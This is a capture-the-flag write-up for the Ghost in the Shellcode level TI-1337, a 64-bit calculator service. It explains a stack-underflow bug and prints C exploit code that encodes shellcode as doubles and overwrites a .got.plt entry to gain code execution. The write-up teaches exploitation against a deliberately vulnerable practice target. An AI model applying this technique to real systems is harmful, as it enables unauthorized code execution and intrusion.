Hey everybody,

This past weekend was Shmoocon, and you know what that means—Ghost in the Shellcode!

Most years I go to Shmoocon, but this year I couldn't attend, so I did the next best thing: competed in Ghost in the Shellcode! This year, our rag-tag band of misfits—that is, the team who purposely decided not to ever decide on a team name, mainly to avoid getting competitive—managed to get 20th place out of at least 300 scoring teams!

I personally solved three levels: TI-1337, gitsmsg, and fuzzy. This is the first of three writeups, for the easiest of the three: TI-1337—solved by 44 teams.

You can download the binary, as well as the exploit, the IDA Pro files, and everything else worth keeping that I generated, from my Github repository.



Getting started

Unlike some of my teammates, I like to dive head-first into assembly, and try not to drown. So I fired up IDA Pro to see what was going on, and immediately noticed that it's a 64-bit Linux binary that doesn't have a ton of code. Having never in my life written a 64-bit exploit, this would be an adventure!

Small aside: Fork this!

I'd like to take a quick moment to show you a trick I use to solve just about every Pwn-style CTF level: getting past that pesky fork(). Have you ever been trying to debug a vuln in a forking program? You attach a debugger, it forks, it crashes, and you never know. So you go back, you set affinity to 'child', you debug, the debugger follows the child, catches the crash, and the socket doesn't get cleaned up properly? It's awful! There is probably a much better way to do this, but this is what I do.

First, I load the binary into IDA and look for the fork() call:

    .text:00400F65 good_connection:
    .text:00400F65 E8 06 FD FF FF    call    _fork
    .text:00400F6A 89 45 F4          mov     [rbp+child_pid], eax
    .text:00400F6D 83 7D F4 FF       cmp     [rbp+child_pid], 0FFFFFFFFh
    .text:00400F71 75 02             jnz     short fork_successful

You'll note that opcode bytes are turned on, so I can see the hex-encoded machine code along with the instruction. The call to fork() has the corresponding code e8 06 fd ff ff . That's what I want to get rid of.

So, I open the binary in a hex editor, such as 'xvi32.exe', search for that sequence of bytes (and perhaps some surrounding bytes, if it's ambiguous), and replace it with 31 c0 90 90 90. The first two bytes, 31 c0, are "xor eax, eax" (ie, clear eax), and 90 90 90 is "nop / nop / nop". So basically, the patched call does nothing and leaves 0 in eax (ie, the program behaves as if it's the child process).
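If you'd rather script the patch than click around in a hex editor, a sketch like the one below would do the same search-and-replace on a buffer holding the file's bytes. The helper name patch_bytes() is made up for this example and isn't part of my exploit code; reading the file in and writing it back out is left to the caller.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: overwrite every occurrence of the n-byte pattern
 * `pat` inside `buf` with the n-byte replacement `rep`.
 * Returns the number of occurrences that were patched. */
size_t patch_bytes(unsigned char *buf, size_t len,
                   const unsigned char *pat,
                   const unsigned char *rep, size_t n)
{
    size_t hits = 0;
    size_t i = 0;

    if (n == 0 || len < n)
        return 0;

    while (i + n <= len) {
        if (memcmp(buf + i, pat, n) == 0) {
            memcpy(buf + i, rep, n);   /* same length, so offsets don't shift */
            hits++;
            i += n;
        } else {
            i++;
        }
    }
    return hits;
}
```

Called with the pattern e8 06 fd ff ff and the replacement 31 c0 90 90 90, it should report exactly one hit. Anything else means the pattern was ambiguous and needs a few surrounding bytes added, as mentioned above.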

You may want to kill the call to alarm(), as well, which will kill the process if you spend more than 30 seconds looking at it. You can replace that call with 90 90 90 90 90 —it doesn't matter what it returns.

I did this on all three levels, and I renamed the new executable "<name>-fixed". You'll find them in the Github repository. I'm not going to go over that again in the next two posts, but I'll be referring back to this instead.

The program

Since this is a post on exploitation, not reverse engineering, I'm not going to go super in-depth into the code. Instead, I'll describe it at a higher level and let you delve in more deeply if you're interested.

The main handle_connection() function can be found at offset 0x00401567. It immediately jumps to the bottom, which is a common optimization for a 'for' or 'while' loop, where it calls the code responsible for receiving data: the function at 0x00401395. After receiving data, it jumps back to the top of the handle_connection() function, just after the jump to the bottom, where it goes through a big if/else list, looking for a bunch of symbols (like '+', '-', '/' and '*'... look familiar?)

After the if/else list, it goes back to the receive function, then to the top of the loop, and so on. Receive, parse, receive, parse, etc. Let's look at those two pieces separately, then we'll explore the vulnerability and see the exploit.

Receive

As I mentioned above, the receive function starts at 0x00401395.

This function starts by reading up to 0x100 (256) bytes from the socket, ending at a newline (0x0a) if it finds one. This is done using a simple receive-loop function located at 0x0040130E that is worthwhile going through, if you're new to this, but that doesn't add much to the exploit.
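For anybody new to this, a receive loop of that general shape might look like the sketch below. This is my own reconstruction of the idea, not the decompiled function: the name recv_line(), the byte-at-a-time reads, and the choice to drop the newline are all assumptions.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Hypothetical sketch: read from socket `s` into `buf` until a newline
 * arrives, the peer closes the connection, or cap - 1 bytes are stored.
 * The newline is not stored and the result is NUL-terminated.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t recv_line(int s, char *buf, size_t cap)
{
    size_t n = 0;

    if (cap == 0)
        return -1;

    while (n < cap - 1) {
        char c;
        ssize_t got = recv(s, &c, 1, 0);

        if (got < 0)
            return -1;          /* receive error */
        if (got == 0 || c == '\n')
            break;              /* connection closed or end of line */
        buf[n++] = c;
    }
    buf[n] = '\0';
    return (ssize_t)n;
}
```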

After reading the input, it's passed to sscanf(buffer, "%lg", ...). The format string "%lg" tells sscanf() to parse the input as a "double" variable, a 64-bit floating point value. Great: an x64 process handling floating point values; that's two things I don't know!

If the sscanf() fails—that is, the received data isn't a valid-looking floating point value—the received data is copied wholesale into the buffer. A flag at the start of the buffer is set indicating whether or not the double was parsed.

Then the function returns. Quite simple!
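In C terms, the parse step described above boils down to something like this sketch. The struct layout and the names token and parse_line() are invented for illustration; the real binary keeps its flag and data in one buffer whose exact layout I'm not reproducing here.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical layout: a flag, then either the parsed number or the raw
 * text. The real buffer layout may well differ. */
struct token {
    int    is_double;   /* 1 if sscanf() parsed a double, 0 otherwise */
    double value;       /* valid when is_double == 1 */
    char   text[256];   /* raw input, valid when is_double == 0 */
};

void parse_line(const char *line, struct token *out)
{
    memset(out, 0, sizeof *out);

    if (sscanf(line, "%lg", &out->value) == 1) {
        out->is_double = 1;
    } else {
        /* Not a number: keep the raw text for the symbol checks later */
        strncpy(out->text, line, sizeof out->text - 1);
    }
}
```

With this, parse_line("10", &t) sets the flag and stores 10.0, while parse_line("+", &t) leaves the flag clear and keeps "+" as text.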

Processing the data

I mentioned earlier that this binary looks for mathematical symbols—'+', '-', '*', '/' in the received data. I didn't actually notice that right away, nor did the name "TI-1337" (or the fact that it used port "31415"... think about it) lead me to believe this might be a calculator. I'm not the sharpest pencil sometimes, but I try hard!

Anyway, back to the main parsing code (near the top of the function at 0x00401567 again)! The parsing code is actually divided into two parts: a short piece of code that runs if a valid double was received (ie, the sscanf() worked), and a longer one that runs if it wasn't a double. The short piece of code simply calls a function (spoiler alert: the function pushes it onto a global stack object they use, not to be confused with the runtime stack). The longer one performs a bunch of string comparisons and does something based on those.

I think at this point I'll give away the trick: the whole application is a stack-based calculator. It allocates a large chunk of memory as a global variable, and implements a stack (a length followed by a series of 64-bit values). If you enter a double, it's pushed onto the stack and the length is incremented. If you enter one of a few symbols, it pops one or more values (without checking if we're at the beginning!), updates the length, and performs the calculation. The new value is then pushed back on top of the stack.

Here's an example session:

    (sent) 10
    (sent) 20
    (sent) +
    (sent) .
    (received) 30

And a list of all possible symbols:

+ :: pops the top two elements off the stack, adds them, pushes the result

- :: same as '+', except it subtracts

* :: likewise, multiplication

/ :: and, to round it out, division

^ :: exponents

! :: I never really figured this one out, might be a bitwise negation (or might not, it uses some heavy floating point opcodes that I didn't research :) )

. :: display the current value

b :: display the current value, and pop it

q :: quit the program

c :: clear the stack

And, quite honestly, that's about it! That's how it works, let's see how to break it!
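To make the data structure concrete, here's a rough C sketch of a calculator stack like the one described: a length followed by 64-bit values, with a pop that never checks for an empty stack. The names, the 64-slot size, and the operand order for '-' and '/' are my assumptions, and only the four basic operators are covered.

```c
#include <stddef.h>

#define CALC_SLOTS 64              /* arbitrary size for this sketch */

struct calc_stack {
    long   length;                 /* signed, so it can go negative */
    double values[CALC_SLOTS];
};

void calc_push(struct calc_stack *st, double v)
{
    st->values[st->length++] = v;
}

double calc_pop(struct calc_stack *st)
{
    /* No check for length == 0: popping an empty stack makes the index
     * negative, which is exactly the kind of bug being described. */
    return st->values[--st->length];
}

/* Pops two values, applies op, pushes the result.
 * Returns 0 on success, -1 for an operator this sketch doesn't handle. */
int calc_apply(struct calc_stack *st, char op)
{
    double a, b, r;

    if (op != '+' && op != '-' && op != '*' && op != '/')
        return -1;

    b = calc_pop(st);
    a = calc_pop(st);              /* assumed order: a was pushed first */

    switch (op) {
    case '+': r = a + b; break;
    case '-': r = a - b; break;
    case '*': r = a * b; break;
    default:  r = a / b; break;    /* '/' */
    }
    calc_push(st, r);
    return 0;
}
```

Pushing 10 and 20 and then applying '+' leaves a single value, 30, on the stack, which matches the example session.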

The vulnerability

As I alluded to earlier, the program fails to check where on the stack it currently is when it pops a value. That means, if you pop a value when there's nothing on the stack, you wind up with a buffer underflow. Oops! That means that if we pop a bunch of times then push, it's going to overwrite something before the beginning of the stack.

So where is the stack? If you look at the code in IDA, you'll find that the stack starts at 0x00603140—the .bss section. If you scroll up, before long you'll find this:

    .got.plt:00603018 off_603018      dq offset free
    .got.plt:00603020 off_603020      dq offset recv
    .got.plt:00603028 off_603028      dq offset strncpy
    .got.plt:00603030 off_603030      dq offset setsockopt
    ...

The global offset table! And it's readable/writeable!

If we pop a couple dozen times, then push a value of our choice, we can overwrite any entry—or all entries—with any value we want!
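The arithmetic for "how many pops" can be sketched as below. One big assumption: I'm treating the length field as the first 8 bytes at 0x00603140, so the first value slot sits at 0x00603148. That layout isn't spelled out anywhere in this post, but it does line up with the 38 pops used in the exploit further down. The function names are made up for the example.

```c
#include <stdint.h>

#define STACK_BASE  0x603140LL         /* start of the calculator's stack */
#define VALUES_BASE (STACK_BASE + 8)   /* ASSUMPTION: length takes the first 8 bytes */

/* Address a push writes to when the length field currently holds `length`
 * (negative after popping past the start). */
uint64_t slot_address(int64_t length)
{
    return (uint64_t)((int64_t)VALUES_BASE + length * 8);
}

/* Number of pops, starting from an empty stack, before the next push
 * lands on `target`. */
int64_t pops_to_reach(uint64_t target)
{
    return ((int64_t)VALUES_BASE - (int64_t)target) / 8;
}
```

Under that assumption, pops_to_reach(0x603018) gives 38 and slot_address(-38) gives 0x603018, the entry for free in the listing above.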

That just leaves one last step: where to put the shellcode?

Aside: floating point

One gotcha that's probably uninteresting, but is also the reason that this level took me significantly longer than it should have—the only thing you can push/pop on the application's stack is 64-bit double values! They're read using "%lg", but if I print stuff out using printf("%lg", address) , it would truncate the numbers! Boo!

After some googling, I discovered that you had to raise printf's precision a whole bunch to reproduce the full 64-bit value as a decimal number. I decided that 127 decimal places was more than enough (probably like 5x too much, but I don't even care) to get a good result, so I used this to convert a series of 8 bytes to a unique double:

    sprintf(buf, "%.127lg\n", d);

I incorporated that into my push() function:

    void do_push(int s, char *value)
    {
      char buf[1024];
      double d;

      /* Reinterpret 8 raw bytes as a double, then send it as decimal text */
      memcpy(&d, value, 8);
      sprintf(buf, "%.127lg\n", d);
      printf("Pushing %s", buf);

      if (send(s, buf, strlen(buf), 0) != strlen(buf))
        perror("send error!");
    }

And it worked perfectly!
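If you want to convince yourself that the encoding really is lossless for a given chunk, a check like this sketch runs the same conversion locally and parses it back with "%lg", the way the server does. The function name is hypothetical. One caveat I'm fairly sure of: byte patterns that decode to NaN print as "nan" on common C libraries and lose their payload, so they wouldn't survive the trip.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical check: returns 1 if the 8 bytes survive the trip
 * bytes -> double -> decimal text -> double, and 0 otherwise. */
int survives_round_trip(const unsigned char bytes[8])
{
    char   text[512];
    double out;
    double back = 0.0;

    memcpy(&out, bytes, 8);
    snprintf(text, sizeof text, "%.127lg\n", out);

    if (sscanf(text, "%lg", &back) != 1)
        return 0;

    /* Compare raw bytes rather than values, so -0.0 vs 0.0 isn't hidden */
    return memcmp(&back, bytes, 8) == 0;
}
```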

The exploit

Well, we have a stack (once again, not to be confused with the program's stack) where we can put shellcode. It has a static memory address and is user-controllable. We also have a way to encode the shellcode (and addresses) so we wind up with fully controlled values on the stack. Let's write an exploit!

Here's the bulk of the exploit:

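    int main(int argc, const char *argv[])
    {
      char buf[1024];
      int i;

      int s = get_socket();

      /* Load the shellcode onto the calculator's stack, 8 bytes at a time */
      for (i = 0; i < strlen(shellcode); i += 8)
        do_push(s, shellcode + i);

      /* Pop it all back off; the bytes stay in memory */
      for (i = 0; i < strlen(shellcode); i += 8)
        do_pop(s);

      /* Keep popping, past the start of the stack, back to .got.plt */
      for (i = 0; i < 38; i++)
        do_pop(s);

      /* Overwrite the entry we landed on */
      do_push(s, TARGET);

      /* Send one more command to kick things off */
      sprintf(buf, ".\n");
      send(s, buf, strlen(buf), 0);

      sleep(100);

      return 0;
    }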

You can find the full exploit here!
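One thing to watch for if you adapt this: the loops use strlen(), so the shellcode can't contain NUL bytes, and do_push() always copies 8 bytes, so the shellcode length should be a multiple of 8. A small helper along these lines could handle the padding. It's a hypothetical addition, not part of the exploit in the repository, and it pads with NOPs (0x90).

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy `len` bytes of shellcode into `out` and pad
 * with NOPs (0x90) up to the next multiple of 8.
 * Returns the padded length, or 0 if `out` is too small. */
size_t pad_to_qwords(const unsigned char *in, size_t len,
                     unsigned char *out, size_t out_cap)
{
    size_t padded = (len + 7) / 8 * 8;

    if (padded > out_cap)
        return 0;

    memcpy(out, in, len);
    memset(out + len, 0x90, padded - len);   /* trailing NOPs */
    return padded;
}
```

The returned length can then drive the push and pop loops directly, instead of calling strlen() each time around.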

Conclusion

And that's all there is to it! Just push the shellcode on the stack, pop our way back to the .got.plt section, and push the address of the stack. Bam! Execution!

That's all for now, stay tuned for the much more difficult levels: gitsmsg and fuzzy!